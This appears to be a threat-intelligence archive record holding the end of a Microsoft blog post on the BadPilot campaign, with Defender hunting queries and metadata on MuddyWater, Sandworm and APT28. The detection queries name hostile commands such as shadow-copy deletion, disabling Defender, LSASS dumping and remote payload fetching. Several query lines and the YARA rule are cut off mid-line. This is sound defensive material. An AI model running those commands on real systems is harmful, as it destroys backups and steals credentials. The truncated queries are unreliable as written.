Evasion\r\nHunting queries  \r\nMicrosoft Defender XDR\r\nThe following sample queries let you search for a week’s worth of events. 
To explore up to 30 days’ worth of raw\r\ndata to inspect events in your network and locate potential PowerShell-related indicators for more than a week, go\r\nto the Advanced hunting page \u003e Query tab, select the calendar dropdown menu to update your query to hunt for\r\nthe Last 30 days.\r\nScreenConnect\r\nSurface the possible exploitation of ScreenConnect to launch suspicious commands.\r\nDeviceProcessEvents\r\n | where InitiatingProcessParentFileName endswith \"ScreenConnect.ClientService.exe\"\r\n | where (FileName in~ (\"powershell.exe\", \"powershell_ise.exe\", \"cmd.exe\") and\r\n ProcessCommandLine has_any (\"System.DirectoryServices.ActiveDirectory.Domain\", \"hidden -e\r\n or (FileName =~ \"mshta.exe\" and ProcessCommandLine contains \"http\")\r\n or (FileName =~ \"curl.exe\" and ProcessCommandLine contains \"http\")\r\n or ProcessCommandLine has_all (\"powershell\", \"-command\", \"curl\")\r\n or ProcessCommandLine has_any (\"E:jscript\", \"e:vbscript\", \"start msiexec /q /i\")\r\n or ProcessCommandLine has_all (\"reg add\", \"DisableAntiSpyware\", @\"\\Microsoft\\Windows Defen\r\n or ProcessCommandLine has_all (\"reg add\", \"DisableRestrictedAdmin\", @\"CurrentControlSet\\Co\r\n or ProcessCommandLine has_all (\"vssadmin\", \"delete\", \"shadows\")\r\n or ProcessCommandLine has_all (\"vssadmin\", \"list\", \"shadows\")\r\n or ProcessCommandLine has_all (\"wmic\", \"process call create\")\r\n or ProcessCommandLine has_all (\"wmic\", \"delete\", \"shadowcopy\")\r\n or ProcessCommandLine has_all (\"wmic\", \"shadowcopy\", \"call create\")\r\n or ProcessCommandLine has_all (\"wbadmin\", \"delete\", \"catalog\")\r\n or ProcessCommandLine has_all (\"ntdsutil\", \"create full\")\r\n or (ProcessCommandLine has_all (\"schtasks\", \"/create\") and 
not(ProcessCommandLine has \"shu\r\n or (ProcessCommandLine has \"nltest\" and ProcessCommandLine has_any (\"domain_trusts\", \"dcli\r\n or (ProcessCommandLine has \"lsass\" and ProcessCommandLine has_any (\"procdump\", \"tasklist\"\r\n or FileName in~ (\"tasklist.exe\", \"ssh.exe\", \"icacls.exe\", \"certutil.exe\", \"calc.exe\", \"bit\r\n \"winrm.exe\", \"dsquery.exe\", \"makecab.exe\", \"hh.exe\", \"pcalua.ex\r\n \"cmstp.exe\", \"esentutl.exe\", \"dnscmd.exe\", \"gpscript.exe\", \"msd\r\n | where not(ProcessCommandLine has_any (\"servicedesk.atera.com\", \"support.csolve.net\", \"lt.tech-ke\r\nFortiClient EMS log capture\r\nIf you believe your FortiClient has been exploited before patching, this query may help with further investigation.\r\nAccording to Horizon3 research, the C:\\Program Files (x86)\\Fortinet\\FortiClientEMS\\logs log file can be\r\nexamined to identify malicious activity. Run the following query to surface devices with this log file for further\r\ninvestigation. \r\nDeviceFileEvents\r\n| where FileName contains @\"C:\\Program Files (x86)\\Fortinet\\FortiClientEMS\\logs\"\r\n| distinct DeviceName\r\nAdditionally, Horizon3 noted that this SQL vulnerability could allow for remote code execution (RCE) using\r\nthe xp_cmdshell functionality of Microsoft SQL Server. The SQL logs can also be examined for evidence\r\nof xp_cmdshell being leveraged to spawn a Windows command shell.\r\nAccording to Microsoft research, the following query could help surface exploitation activity related to this\r\nvulnerability. 
\r\nDeviceProcessEvents\r\n| where InitiatingProcessFileName == \"sqlservr.exe\"\r\n| where FileName =~ \"cmd.exe\"\r\n| where ProcessCommandLine has_any (\"webclient\", \"downloadstring\", \"http\", \"https\", \"downloadfile\")\r\n| where InitiatingProcessCommandLine has_all (\"sqlservr.exe\", \"-sFCEMS\")\r\nTor service\r\nFind services associated with Tor.\r\nDeviceEvents\r\n| where ActionType == 'ServiceInstalled'\r\n| extend JSON = parse_json(AdditionalFields)\r\n| where JSON.ServiceName has 'tor'\r\nYARA rule\r\nUse the following YARA rule to find malicious JavaScript inserted into OWA sign-in pages.\r\nrule injected_cred_logger_owa {\r\nstrings:\r\n$owa = \"\r\nSource: https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology"
	],
	"report_names": [
		"?ref=thestack.technology"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434716,
	"ts_updated_at": 1775826785,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/614ba46c4d82bf61c82ae27fc13348aa15b87319.pdf",
		"text": "https://archive.orkl.eu/614ba46c4d82bf61c82ae27fc13348aa15b87319.txt",
		"img": "https://archive.orkl.eu/614ba46c4d82bf61c82ae27fc13348aa15b87319.jpg"
	}
}